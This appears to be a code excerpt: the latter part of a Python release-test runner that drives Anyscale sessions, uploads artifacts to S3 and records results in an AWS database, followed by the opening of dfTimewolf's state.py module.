f"VALUES (:created_on, :test_suite, :test_name, :status, :last_logs, "
f":results, :artifacts, :category)")
rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
parameters=[
{
"name": "created_on",
"typeHint": "TIMESTAMP",
"value": {
"stringValue": now.strftime("%Y-%m-%d %H:%M:%S")
},
},
{
"name": "test_suite",
"value": {
"stringValue": test_suite
}
},
{
"name": "test_name",
"value": {
"stringValue": test_name
}
},
{
"name": "status",
"value": {
"stringValue": status
}
},
{
"name": "last_logs",
"value": {
"stringValue": logs
}
},
{
"name": "results",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(results)
},
},
{
"name": "artifacts",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(artifacts)
},
},
{
"name": "category",
"value": {
"stringValue": category
}
},
],
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql,
)
def _cleanup_session(sdk: AnyscaleSDK, session_id: str):
if session_id:
# Just trigger a request. No need to wait until session shutdown.
sdk.stop_session(session_id=session_id, stop_session_options={})
def search_running_session(sdk: AnyscaleSDK, project_id: str,
session_name: str) -> Optional[str]:
session_id = None
logger.info(f"Looking for existing session with name {session_name}")
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(name=dict(equals=session_name)))
if len(result.results) > 0 and result.results[0].state == "Running":
logger.info("Found existing session.")
session_id = result.results[0].id
return session_id
def create_or_find_compute_template(
sdk: AnyscaleSDK,
project_id: str,
compute_tpl: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
compute_tpl_id = None
compute_tpl_name = None
if compute_tpl:
# As of Anyscale 0.4.1, it is an error to use the same compute template
# name within the same organization, between different projects.
compute_tpl_name = f"{project_id}/compute/{_dict_hash(compute_tpl)}"
logger.info(f"Test uses a compute template "
f"with name {compute_tpl_name}. Looking up existing "
f"templates.")
paging_token = None
while not compute_tpl_id:
result = sdk.search_compute_templates(
dict(
project_id=project_id,
name=dict(equals=compute_tpl_name),
include_anonymous=True),
paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == compute_tpl_name:
compute_tpl_id = res.id
logger.info(
f"Template already exists with ID {compute_tpl_id}")
break
if not paging_token:
break
if not compute_tpl_id:
logger.info(f"Compute template not found. "
f"Creating with name {compute_tpl_name}.")
try:
result = sdk.create_compute_template(
dict(
name=compute_tpl_name,
project_id=project_id,
config=compute_tpl))
compute_tpl_id = result.result.id
except Exception as e:
if _repeat:
logger.warning(
f"Got exception when trying to create compute "
f"template: {e}. Sleeping for 10 seconds and then "
f"try again once...")
time.sleep(10)
return create_or_find_compute_template(
sdk=sdk,
project_id=project_id,
compute_tpl=compute_tpl,
_repeat=False)
raise e
logger.info(f"Compute template created with ID {compute_tpl_id}")
return compute_tpl_id, compute_tpl_name
def create_or_find_app_config(
sdk: AnyscaleSDK,
project_id: str,
app_config: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
app_config_id = None
app_config_name = None
if app_config:
app_config_name = f"{project_id}-{_dict_hash(app_config)}"
logger.info(f"Test uses an app config with hash {app_config_name}. "
f"Looking up existing app configs with this name.")
paging_token = None
while not app_config_id:
result = sdk.list_app_configs(
project_id=project_id, count=50, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == app_config_name:
app_config_id = res.id
logger.info(
f"App config already exists with ID {app_config_id}")
break
if not paging_token or app_config_id:
break
if not app_config_id:
logger.info("App config not found. Creating new one.")
try:
result = sdk.create_app_config(
dict(
name=app_config_name,
project_id=project_id,
config_json=app_config))
app_config_id = result.result.id
except Exception as e:
if _repeat:
logger.warning(
f"Got exception when trying to create app "
f"config: {e}. Sleeping for 10 seconds and then "
f"try again once...")
time.sleep(10)
return create_or_find_app_config(
sdk=sdk,
project_id=project_id,
app_config=app_config,
_repeat=False)
raise e
logger.info(f"App config created with ID {app_config_id}")
return app_config_id, app_config_name
def install_app_config_packages(app_config: Dict[Any, Any]):
os.environ.update(app_config.get("env_vars", {}))
packages = app_config["python"]["pip_packages"]
for package in packages:
subprocess.check_output(["pip", "install", "-U", package], text=True)
def install_matching_ray():
wheel = os.environ.get("RAY_WHEELS", None)
if not wheel:
return
assert "manylinux2014_x86_64" in wheel, wheel
if sys.platform == "darwin":
platform = "macosx_10_13_intel"
elif sys.platform == "win32":
platform = "win_amd64"
else:
platform = "manylinux2014_x86_64"
wheel = wheel.replace("manylinux2014_x86_64", platform)
subprocess.check_output(["pip", "uninstall", "-y", "ray"], text=True)
subprocess.check_output(["pip", "install", "-U", wheel], text=True)
def wait_for_build_or_raise(sdk: AnyscaleSDK,
app_config_id: Optional[str]) -> Optional[str]:
if not app_config_id:
return None
# Fetch build
build_id = None
last_status = None
result = sdk.list_builds(app_config_id)
for build in sorted(result.results, key=lambda b: b.created_at):
build_id = build.id
last_status = build.status
if build.status == "failed":
continue
if build.status == "succeeded":
logger.info(f"Link to app config build: "
f"{anyscale_app_config_build_url(build_id)}")
return build_id
if last_status == "failed":
raise RuntimeError("App config build failed.")
if not build_id:
raise RuntimeError("No build found for app config.")
# Build found but not failed/finished yet
completed = False
start_wait = time.time()
next_report = start_wait + REPORT_S
logger.info(f"Waiting for build {build_id} to finish...")
logger.info(f"Track progress here: "
f"{anyscale_app_config_build_url(build_id)}")
while not completed:
now = time.time()
if now > next_report:
logger.info(f"... still waiting for build {build_id} to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
result = sdk.get_build(build_id)
build = result.result
if build.status == "failed":
raise RuntimeError(
f"App config build failed. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
if build.status == "succeeded":
logger.info("Build succeeded.")
return build_id
completed = build.status not in ["in_progress", "pending"]
if completed:
raise RuntimeError(
f"Unknown build status: {build.status}. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
time.sleep(1)
return build_id
def run_job(cluster_name: str, compute_tpl_name: str, cluster_env_name: str,
job_name: str, min_workers: str, script: str,
script_args: List[str],
env_vars: Dict[str, str]) -> Tuple[int, str]:
# Start cluster and job
address = f"anyscale://{cluster_name}?cluster_compute={compute_tpl_name}" \
f"&cluster_env={cluster_env_name}&autosuspend=5&update=True"
logger.info(f"Starting job {job_name} with Ray address: {address}")
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
env.update(env_vars)
env["RAY_ADDRESS"] = address
env["RAY_JOB_NAME"] = job_name
env["RAY_RELEASE_MIN_WORKERS"] = str(min_workers)
proc = subprocess.Popen(
script.split(" ") + script_args,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True)
proc.stdout.reconfigure(line_buffering=True)
logs = ""
for line in proc.stdout:
logs += line
sys.stdout.write(line)
proc.wait()
return proc.returncode, logs
def create_and_wait_for_session(
sdk: AnyscaleSDK,
stop_event: multiprocessing.Event,
session_name: str,
session_options: Dict[Any, Any],
) -> str:
# Create session
logger.info(f"Creating session {session_name}")
result = sdk.create_session(session_options)
session_id = result.result.id
# Trigger session start
logger.info(f"Starting session {session_name} ({session_id})")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result = sdk.start_session(session_id, start_session_options={})
sop_id = result.result.id
completed = result.result.completed
# Wait for session
logger.info(f"Waiting for session {session_name}...")
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
_check_stop(stop_event)
now = time.time()
if now > next_report:
logger.info(f"... still waiting for session {session_name} "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
session_operation_response = sdk.get_session_operation(
sop_id, _request_timeout=30)
session_operation = session_operation_response.result
completed = session_operation.completed
time.sleep(1)
return session_id
def run_session_command(sdk: AnyscaleSDK,
session_id: str,
cmd_to_run: str,
stop_event: multiprocessing.Event,
result_queue: multiprocessing.Queue,
env_vars: Dict[str, str],
state_str: str = "CMD_RUN",
kick_off_only: bool = False) -> Tuple[str, int]:
full_cmd = " ".join(f"{k}={v}"
for k, v in env_vars.items()) + " " + cmd_to_run
logger.info(f"Running command in session {session_id}: \n" f"{full_cmd}")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result_queue.put(State(state_str, time.time(), None))
result = sdk.create_session_command(
dict(session_id=session_id, shell_command=full_cmd))
scd_id = result.result.id
completed = result.result.finished_at is not None
if kick_off_only:
return scd_id, 0
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
_check_stop(stop_event)
now = time.time()
if now > next_report:
logger.info(f"... still waiting for command to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
result = sdk.get_session_command(session_command_id=scd_id)
completed = result.result.finished_at
time.sleep(1)
status_code = result.result.status_code
if status_code != 0:
raise RuntimeError(
f"Command returned non-success status: {status_code}")
return scd_id, status_code
def get_command_logs(session_controller: SessionController,
scd_id: str,
lines: int = 50):
result = session_controller.api_client.get_execution_logs_api_v2_session_commands_session_command_id_execution_logs_get( # noqa: E501
session_command_id=scd_id,
start_line=-1 * lines,
end_line=0)
return result.result.lines
def get_remote_json_content(
temp_dir: str,
session_name: str,
remote_file: Optional[str],
session_controller: SessionController,
):
if not remote_file:
logger.warning("No remote file specified, returning empty dict")
return {}
local_target_file = os.path.join(temp_dir, ".tmp.json")
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
with open(local_target_file, "rt") as f:
return json.load(f)
def get_local_json_content(local_file: Optional[str], ):
if not local_file:
logger.warning("No local file specified, returning empty dict")
return {}
with open(local_file, "rt") as f:
return json.load(f)
def pull_artifacts_and_store_in_cloud(
temp_dir: str,
logs: str,
session_name: str,
test_name: str,
artifacts: Optional[Dict[Any, Any]],
session_controller: SessionController,
):
output_log_file = os.path.join(temp_dir, "output.log")
with open(output_log_file, "wt") as f:
f.write(logs)
bucket = GLOBAL_CONFIG["RELEASE_AWS_BUCKET"]
location = f"{GLOBAL_CONFIG['RELEASE_AWS_LOCATION']}" \
f"/{session_name}/{test_name}"
saved_artifacts = {}
s3_client = boto3.client("s3")
s3_client.upload_file(output_log_file, bucket, f"{location}/output.log")
saved_artifacts["output.log"] = f"s3://{bucket}/{location}/output.log"
# Download artifacts
if artifacts:
for name, remote_file in artifacts.items():
logger.info(f"Downloading artifact `{name}` from "
f"{remote_file}")
local_target_file = os.path.join(temp_dir, name)
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
# Upload artifacts to s3
s3_client.upload_file(local_target_file, bucket,
f"{location}/{name}")
saved_artifacts[name] = f"s3://{bucket}/{location}/{name}"
return saved_artifacts
def find_session_by_test_name(
sdk: AnyscaleSDK,
session_controller: SessionController,
temp_dir: str,
state_json: str,
project_id: str,
test_name: str,
) -> Optional[Tuple[str, str, Dict[Any, Any]]]:
paging_token = None
while True: # Will break if paging_token is None after first search
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(
name=dict(contains=test_name),
state_filter=["Running"],
paging=dict(count=20, paging_token=paging_token)))
for session in result.results:
logger.info(f"Found session {session.name}")
if not session.name.startswith(test_name):
continue
try:
session_state = get_remote_json_content(
temp_dir=temp_dir,
session_name=session.name,
remote_file=state_json,
session_controller=session_controller)
except Exception as exc:
raise RuntimeError(f"Could not get remote json content "
f"for session {session.name}") from exc
if session_state.get("test_name") == test_name:
return session.id, session.name, session_state
paging_token = result.metadata.next_paging_token
if not paging_token:
return None
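# Returns (command_id, success) for the latest command of a session. If a
# command is still running, its ID is returned with success=None; otherwise
# success is True only if every finished command that was inspected returned
# status code 0.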
def get_latest_running_command_id(sdk: AnyscaleSDK, session_id: str
) -> Tuple[Optional[str], Optional[bool]]:
scd_id = None
paging_token = None
success = None
while not scd_id:
result = sdk.list_session_commands(
session_id=session_id, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for cmd in result.results:
if not scd_id:
scd_id = cmd.id
completed = cmd.finished_at is not None
if completed:
if success is None:
success = True
success = success and cmd.status_code == 0
if not completed:
return cmd.id, None
return scd_id, success or False
def run_test_config(
local_dir: str,
project_id: str,
test_name: str,
test_config: Dict[Any, Any],
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress: bool = False,
upload_artifacts: bool = True,
) -> Dict[Any, Any]:
"""
Returns:
Dict with the following entries:
status (str): One of [finished, error, timeout]
command_link (str): Link to command (Anyscale web UI)
last_logs (str): Last logs (excerpt) to send to owner
artifacts (dict): Dict of artifacts
Key: Name
Value: S3 URL
"""
# Todo (mid-term): Support other cluster definitions
# (not only cluster configs)
cluster_config_rel_path = test_config["cluster"].get(
"cluster_config", None)
cluster_config = _load_config(local_dir, cluster_config_rel_path)
app_config_rel_path = test_config["cluster"].get("app_config", None)
app_config = _load_config(local_dir, app_config_rel_path)
compute_tpl_rel_path = test_config["cluster"].get("compute_template", None)
compute_tpl = _load_config(local_dir, compute_tpl_rel_path)
stop_event = multiprocessing.Event()
result_queue = multiprocessing.Queue()
session_name = f"{test_name}_{int(time.time())}"
temp_dir = tempfile.mkdtemp()
# Result and state files
results_json = test_config["run"].get("results", None)
if results_json is None:
results_json = "/tmp/release_test_out.json"
state_json = test_config["run"].get("state", None)
if state_json is None:
state_json = "/tmp/release_test_state.json"
env_vars = {
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto"),
"TEST_OUTPUT_JSON": results_json,
"TEST_STATE_JSON": state_json,
"IS_SMOKE_TEST": "1" if smoke_test else "0",
}
with open(os.path.join(local_dir, ".anyscale.yaml"), "wt") as f:
f.write(f"project_id: {project_id}")
os.chdir(local_dir)
# Setup interface
# Unfortunately, there currently seems to be no great way to
# transfer files with the Anyscale SDK.
# So we use the session controller instead.
sdk = AnyscaleSDK(auth_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"])
session_controller = SessionController(
api_client=instantiate_api_client(
cli_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"],
host=GLOBAL_CONFIG["ANYSCALE_HOST"],
),
anyscale_api_client=sdk.api_client,
)
timeout = test_config["run"].get("timeout", 1800)
if "RELEASE_OVERRIDE_TIMEOUT" in os.environ:
previous_timeout = timeout
timeout = int(os.environ.get("RELEASE_OVERRIDE_TIMEOUT", str(timeout)))
logger.warning(f"Release test timeout override: {timeout} "
f"(would have been {previous_timeout})")
# If a test is long running, timeout does not mean it failed
is_long_running = test_config["run"].get("long_running", False)
if test_config["run"].get("use_connect"):
assert not kick_off_only, \
"Unsupported for running with Anyscale connect."
install_app_config_packages(app_config)
install_matching_ray()
# Add information to results dict
def _update_results(results: Dict):
if "last_update" in results:
results["last_update_diff"] = time.time() - results["last_update"]
if smoke_test:
results["smoke_test"] = True
def _process_finished_command(session_controller: SessionController,
scd_id: str,
results: Optional[Dict] = None):
logger.info("Command finished successfully.")
if results_json:
results = results or get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
else:
results = {"passed": 1}
_update_results(results)
if scd_id:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
else:
logs = "No command found to fetch logs for"
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=test_config.get("artifacts", {}),
session_controller=session_controller,
)
logger.info("Fetched results and stored on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
# When running the test script in client mode, the finish command is a
# completed local process.
def _process_finished_client_command(returncode: int, logs: str):
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=None,
session_controller=None,
)
logger.info("Stored results on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
if results_json:
results = get_local_json_content(local_file=results_json, )
else:
results = {
"passed": int(returncode == 0),
}
results["returncode"] = returncode
_update_results(results)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
def _run(logger):
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
session_id = None
scd_id = None
try:
# First, look for running sessions
session_id = search_running_session(sdk, project_id, session_name)
compute_tpl_name = None
app_config_name = None
if not session_id:
logger.info("No session found.")
# Start session
session_options = dict(
name=session_name, project_id=project_id)
if cluster_config is not None:
logging.info("Starting session with cluster config")
cluster_config_str = json.dumps(cluster_config)
session_options["cluster_config"] = cluster_config_str
session_options["cloud_id"] = GLOBAL_CONFIG["ANYSCALE_CLOUD_ID"]
session_options["uses_app_config"] = False
else:
logging.info("Starting session with app/compute config")
# Find/create compute template
compute_tpl_id, compute_tpl_name = \
create_or_find_compute_template(
sdk, project_id, compute_tpl)
logger.info(f"Link to compute template: "
f"{anyscale_compute_tpl_url(compute_tpl_id)}")
# Find/create app config
app_config_id, app_config_name = create_or_find_app_config(
sdk, project_id, app_config)
build_id = wait_for_build_or_raise(sdk, app_config_id)
session_options["compute_template_id"] = compute_tpl_id
session_options["build_id"] = build_id
session_options["uses_app_config"] = True
if not test_config["run"].get("use_connect"):
session_id = create_and_wait_for_session(
sdk=sdk,
stop_event=stop_event,
session_name=session_name,
session_options=session_options,
)
if test_config["run"].get("use_connect"):
assert compute_tpl_name, "Compute template must exist."
assert app_config_name, "Cluster environment must exist."
script_args = test_config["run"].get("args", [])
if smoke_test:
script_args += ["--smoke-test"]
min_workers = 0
for node_type in compute_tpl["worker_node_types"]:
min_workers += node_type["min_workers"]
returncode, logs = run_job(
cluster_name=test_name,
compute_tpl_name=compute_tpl_name,
cluster_env_name=app_config_name,
job_name=session_name,
min_workers=min_workers,
script=test_config["run"]["script"],
script_args=script_args,
env_vars=env_vars)
_process_finished_client_command(returncode, logs)
return
# Write test state json
test_state_file = os.path.join(local_dir, "test_state.json")
with open(test_state_file, "wt") as f:
json.dump({
"start_time": time.time(),
"test_name": test_name
}, f)
# Rsync up
logger.info("Syncing files to session...")
session_controller.push(
session_name=session_name,
source=None,
target=None,
config=None,
all_nodes=False,
)
logger.info("Syncing test state to session...")
session_controller.push(
session_name=session_name,
source=test_state_file,
target=state_json,
config=None,
all_nodes=False,
)
_check_stop(stop_event)
# Optionally run preparation command
prepare_command = test_config["run"].get("prepare")
if prepare_command:
logger.info(f"Running preparation command: {prepare_command}")
run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=prepare_command,
stop_event=stop_event,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_PREPARE")
# Run release test command
cmd_to_run = test_config["run"]["script"] + " "
args = test_config["run"].get("args", [])
if args:
cmd_to_run += " ".join(args) + " "
if smoke_test:
cmd_to_run += " --smoke-test"
scd_id, status_code = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=cmd_to_run,
stop_event=stop_event,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_RUN",
kick_off_only=kick_off_only)
if not kick_off_only:
_process_finished_command(
session_controller=session_controller, scd_id=scd_id)
else:
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": ""
}))
except (ReleaseTestTimeoutError, Exception) as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
except Exception as e2:
logger.error(e2, exc_info=True)
# Long running tests are "finished" successfully when
# timed out
if isinstance(e, ReleaseTestTimeoutError) and is_long_running:
_process_finished_command(
session_controller=session_controller, scd_id=scd_id)
else:
result_queue.put(
State("END", time.time(), {
"status": "timeout",
"last_logs": logs
}))
finally:
if no_terminate:
logger.warning(
"`no_terminate` is set to True, so the session will "
"*not* be terminated!")
else:
_cleanup_session(sdk, session_id)
def _check_progress(logger):
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
should_terminate = False
session_id = None
scd_id = None
try:
existing_session = find_session_by_test_name(
sdk=sdk,
session_controller=session_controller,
temp_dir=temp_dir,
state_json=state_json,
project_id=project_id,
test_name=test_name)
if existing_session is None:
logger.info(f"Found no existing session for {test_name}")
result_queue.put(
State("END", time.time(), {
"status": "nosession",
"last_logs": ""
}))
return
session_id, session_name, session_state = existing_session
logger.info(f"Found existing session for {test_name}: "
f"{session_name}")
scd_id, success = get_latest_running_command_id(
sdk=sdk, session_id=session_id)
latest_result = get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
# Fetch result json and check if it has been updated recently
result_time_key = test_config["run"].get("time_key", None)
maximum_update_delay = test_config["run"].get(
"max_update_delay", None)
if result_time_key and maximum_update_delay:
last_update = latest_result.get(result_time_key, None)
if not last_update:
result_queue.put(
State(
"END", time.time(), {
"status": "error",
"last_logs": f"Test did not store "
f"{result_time_key} in the "
f"results json."
}))
return
delay = time.time() - last_update
logger.info(f"Last update was at {last_update:.2f}. "
f"This was {delay:.2f} seconds ago "
f"(maximum allowed: {maximum_update_delay})")
if delay > maximum_update_delay:
raise RuntimeError(
f"Test did not update the results json within "
f"the last {maximum_update_delay} seconds.")
if time.time() - session_state["start_time"] > timeout:
# Long running test reached timeout
logger.info(
f"Test command reached timeout after {timeout} seconds")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
elif success:
logger.info("All commands finished.")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
else:
rest_time = timeout - time.time() + session_state["start_time"]
logger.info(f"Test command should continue running "
f"for {rest_time} seconds")
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": "Test is still running"
}))
except Exception as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
logs += f"\n{str(e)}"
except Exception as e2:
logger.error(e2, exc_info=True)
result_queue.put(
State("END", time.time(), {
"status": "error",
"last_logs": logs
}))
should_terminate = True
finally:
if should_terminate:
logger.warning("Terminating session")
_cleanup_session(sdk, session_id)
if not check_progress:
process = multiprocessing.Process(target=_run, args=(logger, ))
else:
process = multiprocessing.Process(
target=_check_progress, args=(logger, ))
build_timeout = test_config["run"].get("build_timeout", 1800)
project_url = anyscale_project_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"])
logger.info(f"Link to project: {project_url}")
msg = f"This will now run test {test_name}."
if smoke_test:
msg += " This is a smoke test."
if is_long_running:
msg += " This is a long running test."
logger.info(msg)
logger.info(f"Starting process with timeout {timeout} "
f"(build timeout {build_timeout})")
process.start()
# The timeout time will be updated after the build finished
# Build = App config + compute template build and session start
timeout_time = time.time() + build_timeout
result = {}
while process.is_alive():
try:
state: State = result_queue.get(timeout=1)
except (Empty, TimeoutError):
if time.time() > timeout_time:
stop_event.set()
logger.warning("Process timed out.")
if not is_long_running:
logger.warning("Terminating process in 10 seconds.")
time.sleep(10)
logger.warning("Terminating process now.")
process.terminate()
else:
logger.info("Process is long running. Give 2 minutes to "
"fetch result and terminate.")
start_terminate = time.time()
while time.time(
) < start_terminate + 120 and process.is_alive():
time.sleep(1)
if process.is_alive():
logger.warning("Terminating forcefully now.")
process.terminate()
else:
logger.info("Long running results collected.")
break
continue
if not isinstance(state, State):
raise RuntimeError(f"Expected `State` object, got {result}")
if state.state == "CMD_PREPARE":
# Reset timeout after build finished
timeout_time = state.timestamp + timeout
if state.state == "CMD_RUN":
# Reset timeout after prepare command or build finished
timeout_time = state.timestamp + timeout
elif state.state == "END":
result = state.data
break
while not result_queue.empty():
state = result_queue.get_nowait()
result = state.data
logger.info("Final check if everything worked.")
try:
result.setdefault("status", "error (status not found)")
except (TimeoutError, Empty):
result = {"status": "timeout", "last_logs": "Test timed out."}
logger.info(f"Final results: {result}")
shutil.rmtree(temp_dir)
return result
def run_test(test_config_file: str,
test_name: str,
project_id: str,
category: str = "unspecified",
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress=False,
report=True):
with open(test_config_file, "rt") as f:
test_configs = yaml.load(f, Loader=yaml.FullLoader)
test_config_dict = {}
for test_config in test_configs:
name = test_config.pop("name")
test_config_dict[name] = test_config
if test_name not in test_config_dict:
raise ValueError(
f"Test with name `{test_name}` not found in test config file "
f"at `{test_config_file}`.")
test_config = test_config_dict[test_name]
if smoke_test and "smoke_test" in test_config:
smoke_test_config = test_config.pop("smoke_test")
test_config = _deep_update(test_config, smoke_test_config)
local_dir = os.path.dirname(test_config_file)
if "local_dir" in test_config:
# local_dir is relative to test_config_file
local_dir = os.path.join(local_dir, test_config["local_dir"])
if test_config["run"].get("use_connect"):
assert not kick_off_only, \
"--kick-off-only is unsupported when running with " \
"Anyscale connect."
assert not check_progress, \
"--check is unsupported when running with Anyscale connect."
if test_config.get("artifacts", {}):
logger.error(
"Saving artifacts are not yet supported when running with "
"Anyscale connect.")
result = run_test_config(
local_dir,
project_id,
test_name,
test_config,
smoke_test=smoke_test,
no_terminate=no_terminate,
kick_off_only=kick_off_only,
check_progress=check_progress,
upload_artifacts=report)
status = result.get("status", "invalid")
if kick_off_only:
if status != "kickoff":
raise RuntimeError("Error kicking off test.")
logger.info("Kicked off test. It's now up to the `--check` "
"part of the script to track its progress.")
return
else:
# `--check` or no kick off only
if status == "nosession":
logger.info(f"No running session found for test {test_name}, so "
f"assuming everything is fine.")
return
if status == "kickoff":
logger.info(f"Test {test_name} is still running.")
return
last_logs = result.get("last_logs", "No logs.")
test_suite = os.path.basename(test_config_file).replace(".yaml", "")
report_kwargs = dict(
test_suite=test_suite,
test_name=test_name,
status=status,
logs=last_logs,
results=result.get("results", {}),
artifacts=result.get("artifacts", {}),
category=category,
)
if report:
report_result(**report_kwargs)
else:
logger.info(f"Usually I would now report the following results:\n"
f"{report_kwargs}")
if has_errored(result):
raise RuntimeError(last_logs)
return
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--test-config", type=str, required=True, help="Test config file")
parser.add_argument("--test-name", type=str, help="Test name in config")
parser.add_argument(
"--ray-wheels", required=False, type=str, help="URL to ray wheels")
parser.add_argument(
"--no-terminate",
action="store_true",
default=False,
help="Don't terminate session after failure")
parser.add_argument(
"--no-report",
action="store_true",
default=False,
help="Do not report any results or upload to S3")
parser.add_argument(
"--kick-off-only",
action="store_true",
default=False,
help="Kick off only (don't wait for command to finish)")
parser.add_argument(
"--check",
action="store_true",
default=False,
help="Check (long running) status")
parser.add_argument(
"--category",
type=str,
default="unspecified",
help="Category name, e.g. `release-1.3.0` (will be saved in database)")
parser.add_argument(
"--smoke-test", action="store_true", help="Finish quickly for testing")
args, _ = parser.parse_known_args()
if not GLOBAL_CONFIG["ANYSCALE_PROJECT"]:
raise RuntimeError(
"You have to set the ANYSCALE_PROJECT environment variable!")
maybe_fetch_api_token()
if args.ray_wheels:
os.environ["RAY_WHEELS"] = str(args.ray_wheels)
elif not args.check:
url = find_ray_wheels(
GLOBAL_CONFIG["RAY_REPO"],
GLOBAL_CONFIG["RAY_BRANCH"],
GLOBAL_CONFIG["RAY_VERSION"],
)
if not url:
raise RuntimeError(f"Could not find wheels for "
f"Ray {GLOBAL_CONFIG['RAY_VERSION']}, "
f"branch {GLOBAL_CONFIG['RAY_BRANCH']}")
test_config_file = os.path.abspath(os.path.expanduser(args.test_config))
run_test(
test_config_file=test_config_file,
test_name=args.test_name,
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
category=args.category,
smoke_test=args.smoke_test,
no_terminate=args.no_terminate or args.kick_off_only,
kick_off_only=args.kick_off_only,
check_progress=args.check,
report=not args.no_report,
)
|
state.py
|
# -*- coding: utf-8 -*-
"""This class maintains the internal dfTimewolf state.
Use it to track errors, abort on global failures, clean up after modules, etc.
"""
import logging
import sys
import threading
import traceback
from dftimewolf.lib import errors
from dftimewolf.lib import utils
from dftimewolf.lib.modules import manager as modules_manager
# TODO(tomchop): Consider changing this to `dftimewolf.state` if we ever need
# more granularity.
logger = logging.getLogger('dftimewolf')
NEW_ISSUE_URL = 'https://github.com/log2timeline/dftimewolf/issues/new'
class DFTimewolfState(object):
"""The main State class.
Attributes:
command_line_options (dict[str, str]): Command line options passed to
dftimewolf.
config (dftimewolf.config.Config): Class to be used throughout execution.
errors (list[tuple[str, bool]]): errors generated by a module. These
should be cleaned up after each module run using the CleanUp() method.
global_errors (list[tuple[str, bool]]): the CleanUp() method moves non
critical errors to this attribute for later reporting.
input (list[str]): data that the current module will use as input.
output (list[str]): data that the current module generates.
recipe: (dict[str, str]): recipe declaring modules to load.
store (dict[str, object]): arbitrary data for modules.
"""
def __init__(self, config):
"""Initializes a state."""
super(DFTimewolfState, self).__init__()
self.command_line_options = {}
self._cache = {}
self._module_pool = {}
self._state_lock = threading.Lock()
self._threading_event_per_module = {}
self.config = config
self.errors = []
self.global_errors = []
self.input = []
self.output = []
self.recipe = None
self.store = {}
self.streaming_callbacks = {}
self._abort_execution = False
def _InvokeModulesInThreads(self, callback):
"""Invokes the callback function on all the modules in separate threads.
Args:
callback (function): callback function to invoke on all the modules.
"""
threads = []
for module_definition in self.recipe['modules']:
thread_args = (module_definition, )
thread = threading.Thread(target=callback, args=thread_args)
threads.append(thread)
thread.start()
